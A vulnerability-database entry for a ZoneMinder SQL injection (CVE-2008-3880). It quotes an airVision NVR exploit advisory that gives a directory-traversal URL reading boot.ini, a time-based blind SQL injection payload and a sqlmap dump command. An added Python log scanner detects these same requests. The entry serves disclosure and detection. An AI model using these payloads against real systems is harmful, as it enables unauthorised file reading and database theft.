ZoneMinder 'zm_html_view.php' SQL Injection Vulnerability

Vulnerability ID: 1185534 | Vulnerability type: SQL injection
Published: 2008-09-02 | Updated: 2008-09-17
CVE ID: CVE-2008-3880 | CNNVD-ID: CNNVD-200809-010
Platform: N/A | CVSS score: 7.5
|Source
https://cxsecurity.com/issue/WLB-2012100132
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-010
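|Vulnerability Details
ZoneMinder is security surveillance software for cameras. zm_html_view_event.php in ZoneMinder 1.23.3 and earlier contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the filter array parameter.
|Exploit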
Exploit Title: airVisionNVR readfile() disclosure and sql injection
Google Dork:
Date: Oct 13, 2012
Exploit Author: pennyGrit
Vendor Homepage: http://www.ubnt.com/
Software Link: http://www.ubnt.com/downloads/airvision/airVision-v1.1.3-installer.exe
Version: 1.1.13
Tested on: WinXP SP3
CVE: Possibly related to CVE-2008-1381 and/or CVE-2008-3880
 
Overview: The airvision NVR program is an xampp-like suite that allows a regular PC to be used as a security NVR for the Ubiquiti line of IP cameras. Several programs are installed including apache, PHP, mysql and a modified version of zoneminder. Ubiquiti publishes install packages for both Windows and Ubuntu; however, only the Windows version was tested below.
 
* php readfile() local file disclosure: Unauthenticated users can review the contents of any file on the host machine using a browser:
http://192.168.56.101:7079/index.php?view=file&path=../../../../../../boot.ini
 
* sql AND/OR time-based blind injection: The 'id' parameter in ajax/event.php is vulnerable to a time-based sql injection. Complete enumeration of the mysql 'nvr' database is possible.
Payload: request=event&action=video&eids=1&videoFormat=1&rate=1&scale=1&id=1 AND 3044=BENCHMARK(5000000,MD5(0x67714e77))
using sqlmap: python sqlmap.py --dbms=mysql -u "http://192.168.56.101:7079/index.php?request=event&action=video&eids=1&videoFormat=1&rate=1&scale=1&id=1" -p id --level 3 --risk 3 --technique T --dump
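
Added example, not part of the original advisory or of the vendor's code: a Python check over web access logs that flags the two request shapes described above, a `view=file` request whose `path` climbs directories and a `request=event` request whose `id` is not a plain integer. The log format, sample lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (not taken from the page).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Oct/2012:10:00:01 +0000] "GET /index.php?view=events&page=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Oct/2012:10:00:05 +0000] "GET /index.php?view=file&path=..%2F..%2F..%2Fboot.ini HTTP/1.1" 200 211',
    '198.51.100.9 - - [13/Oct/2012:10:01:00 +0000] "GET /index.php?request=event&action=video&eids=1'
    '&id=1%20AND%203044%3DBENCHMARK(5000000,MD5(0x67714e77)) HTTP/1.1" 200 0',
    '198.51.100.9 - - [13/Oct/2012:10:02:00 +0000] "GET /index.php?request=event&action=video&eids=1&id=42 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A ".." path segment delimited by either slash style, after URL decoding.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
DRIVE_RE = re.compile(r'^[A-Za-z]:')


def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # parse_qs percent-decodes values, so encoded ../ and spaces are seen.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    findings = []
    if "file" in params.get("view", []):
        for p in params.get("path", []):
            if TRAVERSAL_RE.search(p) or p.startswith(("/", "\\")) or DRIVE_RE.match(p):
                findings.append("file-view path traversal")
    if "event" in params.get("request", []):
        for v in params.get("id", []):
            # A legitimate event id is an integer; anything else is suspect.
            if not re.fullmatch(r"\d+", v):
                findings.append("non-numeric event id")
    return findings


def scan(lines):
    """Map line number -> findings for every flagged line."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits


if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

The same allow-list idea (integer-only `id`, no directory segments in `path`) is what input validation in front of the application should enforce, in addition to parameterized queries in the application itself.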

|References

Source: XF
Name: zoneminder-zmhtmlviewevent-sql-injection(44726)
Link: http://xforce.iss.net/xforce/xfdb/44726
Source: BID
Name: 30843
Link: http://www.securityfocus.com/bid/30843
Source: BUGTRAQ
Name: 20080826 ZoneMinder Multiple Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/495745/100/0/threaded
Source: SECUNIA
Name: 31636
Link: http://secunia.com/advisories/31636